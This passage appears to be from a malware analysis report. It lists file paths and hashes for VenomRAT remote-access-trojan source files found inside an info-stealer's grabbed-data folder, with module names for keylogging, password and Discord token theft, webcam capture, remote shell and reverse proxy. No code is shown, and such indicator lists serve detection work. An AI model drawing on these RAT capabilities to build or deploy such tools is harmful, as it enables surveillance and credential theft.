C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Algorithm\Sha256.cs
Filesize720B
MD585715921a8f32e1ed12b97146c05677d
SHA18a85ba36e15ef1f29bb845a3daedfe67fb5c4713
SHA2564c9d44472a83c6143a737420df76349a9d3b4f98e6f2f7d1cbd1a927e76ce57f
SHA512389c4806c9d54e1e39a1728da4b2b4def02045fd769b0e002f562e5a36fb3cd69994df1518c5bc14fcc13f3bc739388772237afeea66a45e93ea58ee7ac4a129
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Connection\ClientInfo.cs
Filesize1KB
MD5bed80095a7c2741d748e353610748248
SHA12d5865f5be0a59a05b7110a2863d8cfe24b5c4f6
SHA256e3e59a8cea5aa9ef030b8b39a516231be1f7f95a64675e0c4b5af79570f33aab
SHA51209e419520f08c83537935d9bb507869a90075cf6cf8341692b82489a1d2ecb2b54dcb314b4e9066197256a4076e071361f7ecb6b737a3b08d2569d0697db1a39
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Connection\Listener.cs
Filesize988B
MD580551e5054bc5b124aed2355da32285c
SHA11ef306f765ca86db49167142fbcdb0db8534cc77
SHA256282e694742c9bd7ed24b7b4aca814e3da6d1cc137782e7bd2bb51a917bbfc1e3
SHA5129af240144d950fdca54fe2c5c71c28c47aa7c2bc17d45df87f7d4a441b60db74a416e27ad2d8563236f21c4790548a0df2189477cb68b9b447700544f2f03e4e
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Forms\FormInputString.cs
Filesize4KB
MD50f4358afd26ccb38d0323ad8b7053759
SHA1c412bdf2d5129a096e653486e151b0a27669bd9f
SHA2568bde20be7db9417b262d401fdcc4792a28f5b78544291d4f9cc51cb55465b3fc
SHA5126d14902d50783c108ee90a129c0d4fb4560c585db9bcac2e0abe2eb803e5f2345eb3bb72997ba32b483b277d56095f4f848a0bf4325c7f5d20ceb61d7975706a
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\GROUP_TYPE.cs
Filesize105B
MD560262ffdba709bff14cdbbe20c4fc482
SHA184a6b735a3acf640fbf2e182de887b882af98be6
SHA256b8147dc43d2db592a610c5ce538c336b5e63fa2a035d840e3b0aea38b8b92cc7
SHA512ab60ae2269dbf5a4ff6f323281a7aef4f8002ab28bf11ba1aba3533cbc875e4264b663c5581b67c2f79d95328eda8449687abd09a1740ac39360a173f3536e41
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\GrabItem.cs
Filesize127B
MD58d30b7ff2e19cc9374d4495a7aa1f992
SHA1ab99d23219441ae6ffa7433188646bc416eb9d55
SHA256420fd6ea60a7ab80136e1febb629499ba7f6d0e287bd35c002a1cf66ba8ac907
SHA512f5453016d114d38674df9790deb9ec0a2e760fb597dae28152970f8f71e17e4cfec74454b718eedc70e14ee022df5adbb3e2387b2e33459bca86d91d90017ea0
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleAudio.cs
Filesize1KB
MD5b942018aaf8e44f8312f1cdaf4ab5963
SHA1c163119ff65e112a1e15d2829abe0e728dfbaaa5
SHA2562893a50be69449f5180d1f606d51f794881a4f3ad4a46a1afc96047e0a5a7a11
SHA51240e3082bf5edf5957fe59caa2a514bcb6774ac49ba5c0c563590e9efdd983b91ddfd34b1c4e9cfd18d1303a90730b4b225fde1d1ad02b02ad59a89ea022eddc8
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleDiscordRecovery.cs
Filesize1KB
MD52d544b4a5df51c5c2e1a09411f3f5f6f
SHA16c4648287c615aa9796eee80024fc7ca77ce120c
SHA2567623d3a4500e713861fb2b5fc5525b37b4687b32b114e344f337f76da5647bb1
SHA512447be05c416e3fb4667ea1b1601f14b3028bdabd272a32a225ee7cdf14e1dd99846c272e51d56f24416ad3fbedfee6fd4a63fe10c3ae303df5e6c9f6041470af
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleFileSearcher.cs
Filesize1KB
MD575925ce3f30735bd0b0287a76524669c
SHA1471a6f010a31598ab4ea117961dda41f99d650ac
SHA2568ccf94f6c909dd65bc622d579b103d101391d8e299f01964814a07f06dbaee9a
SHA512d2fffa14b9ea0f66050a31146dd1ebcddc29e8c4689ac6996e7e274cf6f3d29fc5c8ecf9e70f909542c03eab370cf6871d35b044990d214e09f1fecf79978e2c
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleFun.cs
Filesize521B
MD55af0c2b66adbf0f737182a1cbaf8b06f
SHA1bf04be08b5fdd6d8c10f7d6b81c719ab93e00fe4
SHA2564f9e984d9a16ee9d6a279827a3a768479761e05973da60ea6acda6b4ca6d51c5
SHA512a04db6a14cb62a81bd1ca6a0f24daed53a4b910ae43c782fc0abd9fc44e6d4c6c802ea53447258c5875302b3bf3afcedfed6e83ef0a5a181c615d991e5e618f4
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleInformation.cs
Filesize756B
MD5997070d0dcaf58c8acf8fa6a4ee6c59f
SHA182a61aeeb6c00979cdfb46f0e976f636aa9e78a0
SHA25642aee1a4eadcfd0cc6c0d0198fb93c26fd237fb5ad88c9d833eb90c568cd667a
SHA51270e64de9966457815641b19cd2474e77c181aa728b63212bcc0e7b4151a149dc550a5bc2b7700611eb4349dbf4e9dfaf6734264877038ae014043b3d2ba0660e
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleKeylogger.cs
Filesize912B
MD59b19dd508c794c8c95ad808f8a972ffa
SHA15d5a031311979f46b4baf1d87d920088cba1e2e5
SHA2565d66901ed9ab6638f1a1528e7db73568fbeb88cdbe55f1c24e8f584ed7c841e3
SHA5123c82ffddb58fbbe73b7d3016d817e45f3b713df1f12f769aac889b865a9ae485d691198536d4359ac6c6a885890803ee18143b31626d2301920f265a62fa24aa
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleListView.cs
Filesize3KB
MD58a39467764a27988be49c6e9eda99ee9
SHA1973a59769cdbf721fdaa00b436f8b7c46d2f8311
SHA2563f8cd8916e3d1810ef7a45825b755b24ff617e12a24862310157a8cf7c4aea87
SHA51248205b6ec896e2a3a1a2f2e233f337a2312593b69eb5410594006de160828b2a937f3b19e2274fc43da62479bd1a5fc841546cd6a456c51b41882981c3822e35
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleLogs.cs
Filesize650B
MD5c866a1941316f762063f079facd66f13
SHA1df08eb16b5e76b39ad5eabee215ca61b124ef2a4
SHA25643954da246e0f876276d614e30de2724fde1cd0f37f6abd06164cbd1a8276d9c
SHA512b38dadd75d2be4a917e8e3a7f4e2669a5a80584653774fae663cfb781874b26a2ad5d771808e97433792a0f79771f134d859b8e9de44279a3aec5ed470d40052
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleNetstat.cs
Filesize701B
MD511f2de3e089a139332512fa520aa9a34
SHA12d73a9e02ed1d68fe9cb0c2244fc448f46f9c077
SHA2560937404bf4342447c07e52b9a9eedb7c19e228736b7332fdf519002498181f39
SHA5122061f1db3988c64780fc692cf1b3090f78c3b8aac3512c391a31e755d7a4784630dc11c06c312a40bab106efef9a345652d56dcc1a9599e5f4eb187453615875
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandlePassword.cs
Filesize1KB
MD5489ec5bd784a289f7a1f86ac96566163
SHA1180dd76098488e5766117972d8c255249ccccfcc
SHA25648ac41cb4941bfb6d8ca1ea774051aef11da0ac48e6b1109f1cd69c1d4bc8461
SHA512c944fa3aa020dad1fa622ccb38be386bc0787ffcd9df1a3db6f57f91cc24ca769eef1a9ed53a85e25bead9800a8856afd1419ef0af6c5ef8636d6f12902239f1
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandlePing.cs
Filesize804B
MD5ec0de2ff72a776c8984fbfd33288f035
SHA1ffeb8937b149f9720687ddc733604e85e7065945
SHA2566772f1bb705cce9da78cc9734c7dce636ebf54181e2938bd1068e83c587ab19d
SHA5129912d9645b257b53f4d82ea7818ad6a33126b47fcfdb3f242c40907d00f8bd4666dd7ce1978e371067ff52d002c64256e8fd377887099c9306d114f866b0368f
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleProcessManager.cs
Filesize876B
MD58450f1141555b15676843253c15879ff
SHA18d5060b5cb8a906a6d7ded304d970ed65cdb0895
SHA2561f0a8b3faa24cd2f54710b629f818a4bdbc6455335815323f94b84c41ba94a2d
SHA5128e1494a8d34a273065aa6a89b023718e0638de44d51630e68149e4151ecf55c41124d133bc9e1ae2a5798856a9fd7b7e94cd7642ce8228e8907d6cab4f954408
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleRecovery.cs
Filesize2KB
MD57e22f1580c99efa12626e891bd1df832
SHA164abdc0f49a342b13176b68c65b818d67ee0b540
SHA25665b0c8804e7d00e41996cb1cd9b6b299f163da6435a2fa9a62c81dae9ab0e777
SHA5123b3d283cb083eefad7431a01ead70f76f3da1b3431d552f5a2ee838d1f9ba22c1ee32241c8f7c438317b3a1382b51f26edc0cdd420ec232158b0dda84829e831
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleRemoteDesktop.cs
Filesize2KB
MD599e0882d667effb034c2241c6571e053
SHA1236e813dea97494a75cb19449995848b2783ce54
SHA2561f52aae3796dc593634a7580c490e51337641484cb13687ab78da9a6d7266b05
SHA512264c3292a04d90628a62592c3a309cd1e6e2e0290a8fe59fe8448e20125a7d1b73aac1230a1f8b6eeb4f9cbdacff93b0da67e70692cc9d07849312819d5ebde9
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleReportWindow.cs
Filesize364B
MD507c125d1df83d2ed5ef3ffeaa30873d7
SHA164e8acd29ae662b2a8c38f2f262e11a9c7aecbc5
SHA2566100d26a19bcea0d8e47b1e17d56924e05994150db5bcb7d5e45ab2df4c480cd
SHA512c250aa95d2a0ee6860d88e471d7fde665d3652af2acf9457a0f361f5dd93c66169a65842e20a92f28ef0e880273d619227343cacfa6315daf374d1fccf8c3676
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleReverseProxy.cs
Filesize4KB
MD5f910695bbc64f69aa3160e22a92887d9
SHA10b5a09201402ea0b4ffad5b6a67b731f76162daf
SHA25617933fa5678310cecde308ce17e7daa9a08bd80dcd8f24cfefba069bdab00d4f
SHA512b97c3149e1a823ed453035642805000fe3ae93993b21b73466c1f2ec85da9eb71d198e84cc35564d11f411ec84ec5b7078469a9627c4e7edfe0ababbd5f617e0
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleShell.cs
Filesize736B
MD5701d8885698ce753af36b1ea16dc53a2
SHA1f72f40de13610233ac6847d6e4183cec2bf2066d
SHA2569847ed0f80df3e0b5a2d271d4931917ba0d17ec0ca7b4f3515f5a080b9c626a7
SHA512add1c351478da759d6e44ad594f19aafdd788e8e73179dc99efce78cbb3ebc5f8d8872417ad96feac8f3ef48dfb14b4d03590aedaa5495b4e27e4238da1cb153
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleStealer.cs
Filesize1KB
MD5e2b5359cc734813e61fc56e969ac3612
SHA19573736fb5180d7274a3cb16450af973adf634e7
SHA256980fc7ca1a940ab862c4d34ae46d6f8dbd28c7a28b9ac0f0be7dc5015debad45
SHA512a8d457b43737f5112e3f9988d6086eb09d88300e4d5c51fb36861eb8a12aca56b98455ef25918f37e4ca1f5b470e92e067ec527f1494d63bd97377c24db967ab
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleThumbnails.cs
Filesize1KB
MD501f7b629a223480a156e34c46729b11b
SHA10035cb4e68f88e32332041c46febe8fddb14bb5b
SHA256a517a551ca23091bcb7dabf31700157014e161076eb78b0472a270d689dc4397
SHA512e34462d233d6afad0d5b83e17f1c643579336fa91c8f6daa4f6296d7024deedeffc5ae54f274716f5d003f8e0b67dca3347e6476160a4750ba354ecf9eedbaf0
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\HandleWebcam.cs
Filesize3KB
MD592bdf35155b5d91a299a657fd93f4357
SHA1b3159f2f3bde820a347f907209837091ad6beb62
SHA256a1cfe33eee1bbe4bc217fa9415da2566675a7913de4df2a659bc53e58662df1b
SHA5125f9153749c5b3b7934fa59b47a272c6ad13f728937b52b7c1b37d7357210f0d9e03ae269d7af03999f5e9dcc3f97a2fa5718344772cb816afbc1f22fb221db08
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\LogMsg.cs
Filesize133B
MD59434293de66873db63ee1aebf6877040
SHA197b9ed8694d6a7de0719d120756de8a1562f88c4
SHA25604bbb407cab7964e81a4b41cdb2eddf425becff34e1e1b0ba88b40a911599ad7
SHA5124caeb9d108a7b8fe60b62ee60ef856d9e7ce53e464b361ea48de3a237aeb74ac0837cd2735768df5202705c49dda900d86eb66befcc1561373d479ee18e5da6a
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Handle_Packet\NetStatItem.cs
Filesize215B
MD5c98bd973dd759d05b84815a2e1f72e89
SHA1c0fefba6c20876311fd4bb43e28c572b5c2bfdcc
SHA256d182d99835371cfb00c574ba030823c2bb4c4074a6feaa94e0d5da0d22faaa80
SHA5121db2aab48e86abeedac8f175e7ca93a8f6967dacdb57e022a7dd1c146126f19227285301ebedb3dcaa2477e27460d4967f66f0f3c0e6faf3bc0945811e7a16b6
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\AeroListView.cs
Filesize1KB
MD536942538b622b3dd21e2443059442284
SHA1c8d241ab6579f5ef4a1b9edfdf70d3cafbe0fa5b
SHA2569720198c3970602f591627d491601976f5cfed81e5fe80075a86d2efc30d6259
SHA51244e848c6e2f04e9e6051c8ff3463f0af1f4503fce30c229d4b698b3ff57dc946ee9752bc6d669cd7ff4cde16a25e8ad07c6b165cf5d49413199f00afaeecc0da
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\AsyncTask.cs
Filesize490B
MD5badd9a9e25a636d1ad905bada36d7f90
SHA17e4fbe60432017c025506a6ec9fedbf4e0042f24
SHA256b7606362d8d1a01bf37b5d12026e82ddd670e564ef0eee6923b032b9aa91fc48
SHA512e07e542340c0fcf50056e4cf8b8e0fb57734865cd4edef884b601e814befe6133c4b75793522dcd5ab63e7651a15b5706da0e165b7bd219765d862c78031ab12
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\ByteConverter.cs
Filesize2KB
MD583551c9e7415c2e67346ab9db662b0a3
SHA1a8471b2d28310add3bbe61b431699fcaf698bca6
SHA256256b78755f49543101d035517ebe0eec6de0c22c0568a453a41e66860b0d7823
SHA512df0eaba61a9c23c89f1ef492ff7f2eeb1e5d59bf2f299d6a1cc49abebfd24092f42c673c46d948b556d714c10e1257be6cec090540ab462ea0e00a73645789ac
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\CreateCertificate.cs
Filesize2KB
MD542df5461222712f2419565c67aabc51c
SHA1bceff52637fe5f1fcca4c78e5053870db94ea917
SHA2567ee33bf3a9474d10c8ab8e67a49fbb170fe7a45e84ae2173a97ef1f7c6c1d9f2
SHA512a3e1d0931a5b52bc7a93ae671601b4bae65f678948f68d56b94612eb9ede7b458433740e39a77203d9746c9f02e16a34ab1e9c5b553f3cbd125019866ccec9ca
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\DingDing.cs
Filesize1KB
MD54168d1bf718022655d21c0f012d5d260
SHA1ab1b2de7136b69bad05129c0f5e9c31a9333cbad
SHA256857f74bdb59f24754157077aa1c43b098b7960d1d5b5410bd7b11ba711834010
SHA5124852bac9032f89843e6f3a0501a54320c1d6d71a89d5ccee3fd78914902f25aaeb302fdf084d4d31eecc657988be1a5fbae489c31b0e74a2eac43d40f2a1140f
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\HexEditor\ByteCollection.cs
Filesize1021B
MD54d41af4f67f8f3a3a3b4713fd3fb29f3
SHA11153fb1076f82fc08d1f6bd12e881d00a70a01e3
SHA25664144608ec506f9e2a584592afb97cde3491303997604fb1b57f9d8d468ea342
SHA512b97746d01d70a8837244b360b7647595e20a84894d3ba916d31fe42d8c61e439c29a4226579462a8ff5d431312f2b85a526eb873333c1ed82a1a63647374f575
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\HexEditor\Caret.cs
Filesize3KB
MD5f3e5a9e2a5d683bb20a8a1ab0b0294ad
SHA10e9b9ecaaea69d902f1ee2821b6e738d900cc732
SHA2566d594bbe84c588da03de1b7ddfc4fb75e29c55ce18cc03d1cb4c206bec4dd18e
SHA512ff8fb423bd4e3f9bab99bd3b65a084e4d600851dfc697812443677a2ee4a5a7be1ac2fb6226d7a26892d49025ca914ff7fb221b27a2f6e4937619bd91c06ad72
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\HexEditor\EditView.cs
Filesize2KB
MD5f1487dff480014ad33ee3d31ca22597a
SHA1f650dcd1dded1f0f0d6cd60f6e0854ad3710fb73
SHA25625bf5abebda96a0334951270dac1e40d62c069fccf62b3f78f3e0427f60e6736
SHA512e6a01430ba5915469d86f0453a8cf8e1daa0dfc5e55bf66973ea50d1990489e6df28fda4541565dd8a8c4cbb02b48ff5fe864f5eb13c8daaf7ef7478530e2925
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\HexEditor\IKeyMouseEventHandler.cs
Filesize442B
MD56aa78c8040dce223b73ce96dde6028f1
SHA1f86f361b1ce00b1f592017de1564ecb4980f000e
SHA2563e629d9e3cd05566b50b9352c58065bbaf982dab2056d85f4aae2478f7a50d94
SHA512a98b3cce02be580f477a40ab3a3dccf53d1cf9f87b68b5ff5f4d951949120d31f39448300efb5d489308c955f5bfdf4e833910ec24a51fe5b543e6fe2347ebdc
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\ListViewColumnSorter.cs
Filesize1KB
MD5580db2008a0de5ad84c7e56c8110c68b
SHA1d1247f3a48668246f3e46823ca0920f9a378abe3
SHA2564c6e9fb8539ca679eecdc2a7d32e389618858acd28da168f83a327c39cfecb8a
SHA512f230075636478394c2fa77e7d770031ec33c6513fc6fc28d2c83bc23e49841308889f1d666253613c9f745dd399bee9ab1334ca8b99eba5b3df09dc67a822b84
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\ListviewDoubleBuffer.cs
Filesize317B
MD56ad59b7c730094c10f552a01c4f82d17
SHA13d37270a0989d88860228934df490a8617c247b0
SHA256f2f1c033cd7b94345017716d95df1151eaaeeb9b5eb088034e7354780ab8f40d
SHA5127b191a183c57c8c36195d6a7a74fca320f182448dfa60a94701ac384caf19e66b9f2cc23eb155970daa0b27e7a85c055fd7a6788f1f75e23f5b221c8a4229072
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\Methods.cs
Filesize3KB
MD5f84f52f25d00d1cf44af02271fc657cc
SHA1fdd6c07145f0c0a02403f7669cdc1dcbdcf1c829
SHA25660a74326857ed25e0c95ed258831f6b0d7298e502f75bbf5c67d5d8c519751a3
SHA5128d31e93e91d5035356d5983081c7aff4e6c86e10f503f11ccbebac6bf10035bb3ee0b4a748a16ae022fa810eee8ee8ea282dde7cc084577109c1bb7671f7d870
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\NativeMethods.cs
Filesize1KB
MD55ad9c856d1d2a661f4d8d8af07d0afda
